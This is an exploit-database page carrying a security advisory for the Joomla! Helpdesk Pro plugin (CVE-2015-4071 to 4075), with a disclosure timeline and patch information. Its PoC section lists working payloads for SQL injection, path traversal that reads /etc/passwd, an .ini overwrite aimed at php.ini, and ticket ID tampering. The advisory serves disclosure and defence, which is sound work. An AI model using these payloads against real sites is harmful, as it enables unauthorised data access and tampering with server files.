header-logo
Suggest Exploit
vendor:
Helpdesk Pro
by:
Simon Rawet, Kristian Varnai, Gregor Mynarsky
8.1
CVSS
HIGH
Multiple Vulnerabilities
862, 79, 89, 22, 434
CWE
Product Name: Helpdesk Pro
Affected Version From: < 1.4.0
Affected Version To: 1.4.2000
Patch Exists: YES
Related CWE: CVE-2015-4071, CVE-2015-4072, CVE-2015-4073, CVE-2015-4074, CVE-2015-4075
CPE: a:joomla:helpdesk_pro:1.3.0
Metasploit:
Other Scripts:
Tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei Metadata: {'max-request': 1, 'framework': 'joomla\\!', 'vendor': 'helpdesk_pro_project', 'product': 'helpdesk_pro'}
Platforms Tested:
2015

Joomla! plugin Helpdesk Pro < 1.4.0

The Joomla! plugin Helpdesk Pro version prior to 1.4.0 is vulnerable to multiple exploits including direct object references, XSS, SQL injection, local file disclosure/path traversal, and file upload vulnerabilities. These vulnerabilities allow an attacker to read other users' support tickets, execute malicious scripts, manipulate the database, and disclose local files on the server. The vulnerabilities have been assigned the following CVEs: CVE-2015-4071 (Direct Object References), CVE-2015-4072 (Multiple XSS), CVE-2015-4073 (SQL Injection), CVE-2015-4074 (Local file disclosure/Path traversal), and CVE-2015-4075 (File Upload).

Mitigation:

Update to version 1.4.0 or later. No official testing has been done on earlier versions, but all versions prior to 1.4.0 are suspected to be vulnerable.
Source

Exploit-DB raw data:

Document Title
==============
Joomla! plugin Helpdesk Pro < 1.4.0

Reported By
===========
Simon Rawet from Outpost24
Kristian Varnai from Outpost24
Gregor Mynarsky from Outpost24
https://www.outpost24.com/

For full details, see;
https://www.outpost24.com/outpost24-has-found-critical-vulnerabilities-in-joomla-helpdesk-pro/


Tested on
=========
All exploits were tested and verified by Outpost24 for HelpDesk Pro version 1.3.0. While no official testing has been done on earlier versions, all versions prior to 1.4.0, where the issues were finally patched, are suspected of being vulnerable.

Release Date
============
2015-07-16

CVE
===
CVE-2015-4071 CVSS: 4.0 Direct Object References
CVE-2015-4072 CVSS: 6.5 Multiple XSS
CVE-2015-4073 CVSS: 7.8 SQL Injection
CVE-2015-4074 CVSS: 7.8 Local file disclosure/Path traversal
CVE-2015-4075 CVSS: 6.8 File Upload



Vulnerability Disclosure Timeline:
==================================
2015-05-23: Vulnerabilities discovered and reported to mitre
2015-05-25: Vendor contacted
2015-06-21: Vendor released update version: 1.4.0
2015-07-16: Public disclosure


PoC
===

Direct object references CVE-2015-4071.
Authenticated
Path: http://{target}/component/helpdeskpro/?view=ticket&id={ticketId}

It's possible to read other users' support tickets by changing the numeric id.


XSS CVE-2015-4072.
Mostly authenticated dependent on site configuration
Output validation is universally overlooked
Example: Name and message
Path: http://{target}/index.php?option=com_helpdeskpro&view=ticket&layout=form&Itemid=1


SQLi CVE-2015-4073 for both SQLi.

There are 3 SQLi:

Authenticated
Vulnerable parameter: filter_order
Path: http://{url}/index.php?option=com_helpdeskpro&view=tickets
Post data: search=&category_id=0&status_id=-1&limit=10&limitstart=0&option=com_helpdeskpro&task=&boxchecked=0&filter_order=SLEEP('10')&filter_order_Dir=DESC

Unauthenticated
Vulnerable parameter: ticket_code
Path: http://{url}/index.php?option=com_helpdeskpro&view=ticket&ticket_code=1"%20or%20sleep(5)%20%23

Unauthenticated
Vulnerable parameter: email
Path: http://{url}/index.php?option=com_helpdeskpro&task=ticket.save
Post data: name=asdf&email=user@example.com"%20and%20sleep(5)%20and%20"3"="3


Local file disclosure/Path traversal CVE-2015-4074.
Unauthenticated
Path: https://{url}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe


File Upload CVE-2015-4075.
Unauthenticated
Path: http://{url}/index.php?option=com_helpdeskpro&task=language.save
Injected parameter: item, keys, attacker specified
Post data: lang=&item=./../../../../../../etc/php5/apache2/php&keys[]=[PHP];&[PHP];=val%0aAnyData%0a;
Description: Allows for .ini files to be created wherever the web server has write access. If the .ini file already exists and is writable, it will be overwritten by the server. In a poorly configured system, this will allow for code execution by including applicable arguments in .ini files. This however is not applicable to most systems. Any non-protected .ini files will be possible to replace, with impact depending per file. This PoC will overwrite the file /etc/php5/apache2/php.ini with the content:
;key="val
AnyData
;"